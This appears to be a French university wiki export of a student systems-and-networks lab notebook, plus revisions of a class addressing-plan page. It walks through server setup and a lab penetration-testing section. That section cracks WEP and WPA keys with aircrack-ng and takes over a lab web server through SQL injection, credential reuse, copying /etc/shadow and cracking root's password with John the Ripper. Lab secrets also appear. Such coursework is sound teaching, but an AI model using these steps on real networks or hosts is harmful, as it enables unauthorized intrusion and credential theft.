$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Sécurisation des données (RAID 5) =<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
= Chiffrement des données =<br />
<br />
a</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56788TP sysres IMA5sc 2021/20222021-11-30T15:00:47Z<p>Bjacquot : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 11 || 10.11.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.11.0.250 || 10.11.0.251 || 10.11.0.252 || 10.11.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.2.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.3.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.4.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.5.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.6.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.7.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.8.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.9.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.74 || 192.168.222.75 || 192.168.222.76 || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
= Administration =<br />
Vlan 1 = Vlan d'administration<br />
{| class="wikitable"<br />
! Nom de l'appareil !! IPv4<br />
|-<br />
|router e306 || 10.1.0.1/24 <br />
|-<br />
|router e304 || 10.1.0.2/24 <br />
|-<br />
|ap e306 || 10.1.0.3/24 <br />
|-<br />
|ap e304 || 10.1.0.4/24<br />
|-<br />
|}<br />
<br />
<br />
=Architecture réseau=</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56787TP sysres IMA5sc 2021/20222021-11-30T15:00:32Z<p>Bjacquot : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 11 || 10.11.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.11.0.251 || 10.11.0.252 || 10.11.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.2.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.3.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.4.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.5.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.6.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.7.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.8.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.9.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.74 || 192.168.222.75 || 192.168.222.76 || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
= Administration =<br />
Vlan 1 = Vlan d'administration<br />
{| class="wikitable"<br />
! Nom de l'appareil !! IPv4<br />
|-<br />
|router e306 || 10.1.0.1/24 <br />
|-<br />
|router e304 || 10.1.0.2/24 <br />
|-<br />
|ap e306 || 10.1.0.3/24 <br />
|-<br />
|ap e304 || 10.1.0.4/24<br />
|-<br />
|}<br />
<br />
<br />
=Architecture réseau=</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56723TP sysres IMA5sc 2021/20222021-11-29T17:55:18Z<p>Bjacquot : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
